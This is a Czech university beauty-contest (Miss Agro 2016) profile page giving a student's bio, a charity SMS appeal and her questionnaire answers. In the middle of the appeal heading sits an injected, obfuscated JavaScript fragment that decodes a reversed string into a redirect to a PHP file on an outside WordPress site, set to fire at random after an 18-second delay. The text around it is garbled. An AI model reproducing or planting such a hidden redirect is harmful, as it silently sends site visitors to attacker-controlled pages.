Lada Pařízková

Profil

Fakulta: Fakulta agrobiologie, potravinových a přírodních zdrojů (FAPPZ)
Obor: Zahradní a krajinná tvorba (ABZU)
Věk: 24 let
Ročník: 3.

Lada je bývalá vrcholová atletka, která raději předčasně ukončila svou „kariéru“, protože jí to moc nešlo. Sice na to přišla po 8mi leté dřině, ale lepší někdy, než nikdy. Je to vtipná energická slečna (někdy až až), která je pro každou prču. Občas není vidět, za to je vždy slyšet. Miluje společnost a veškerý humor (i ten škodolibý). Je upřímná a nemá ráda spoustu lidských vlastností, ale jelikož nekterými sama oplývá, nemá smysl se zabývat detaily. Do Miss Agro se přihlásila čistě ze zvedavosti (kamarádka ji vyhecovala) a proto si to chce užít, jak jen to bude možné.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ h4=“Pošlete DMS a zařaďte se do slosování o ceny“ css=“.vc_custom_1516548660034{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím organizace Nadání a dovednosti o.p.s. Podpořte je i Vy! Pošlete dárcovskou SMS ve tvaru DMS ROZHLED na číslo 87 777. Cena DMS je 30 Kč. Více na www.darcovskasms.cz. Zasláním DMS do 10. 5. 2016 můžete navíc za Vaši podporu získat odměnu.

Proč by ses zrovna Ty měla stát Miss Agro 2016?
Nejsem prototyp modelky a v dnešní době ten, kdo nejde s davem, patří mezi zajímavé a vyhledávané to může být jedna z mých výhod i nevýhod. Možná nesplňuji „parametry“ dokonalé ženy, ale stojím si zatím, že když chcete, naučíte se vše, co je potřeba k tomu, aby jste dosáhli svého. To, jak člověk vypadá, samozřejmě do jisté míry ovlivnit můžeme, ale já osobně si myslím, že osobnost je někdy mnohem důležitější, než vizáž. Chci si totiž obhájit to, proč většinu svého času jsem chodila do školy neupravená a v teplácích.

Kdyby ses mohla narodit ještě jednou, kdo bys byla?
Každý chceme něco, co nemáme, nebo mít nemůžeme. Kdybych tuhle otázku dostala znova v nějakém časovém limitu, asi bych vypálila nějaké jméno osoby co se mi líbí, nebo má můj obdiv, ale jelikož tento dotazník vyplňuji doma v pohodlíčku ve vytahaných teplácích, kde na mě nikdo neciví a nečeká nějakou supr čupr odpověď, tak bych řekla, že bych chtěla být mnou, ale mít v některých případech víc štěstí a pozměnit rozhodnutí rodičů, nebo spíš, aby vůbec nějaké to rozhodnutí učinili a dali mě na nějaký perspektivní sport nebo činnost už od raného dětství.

Na který předmět na ČZU vzpomínáš nejvíce a proč?
Je jich více a jsou to předměty, které mi daly pořádně zabrat. A popravdě na ně ani nechci vzpomínat, jelikož díky nim jsem si prodloužila studium.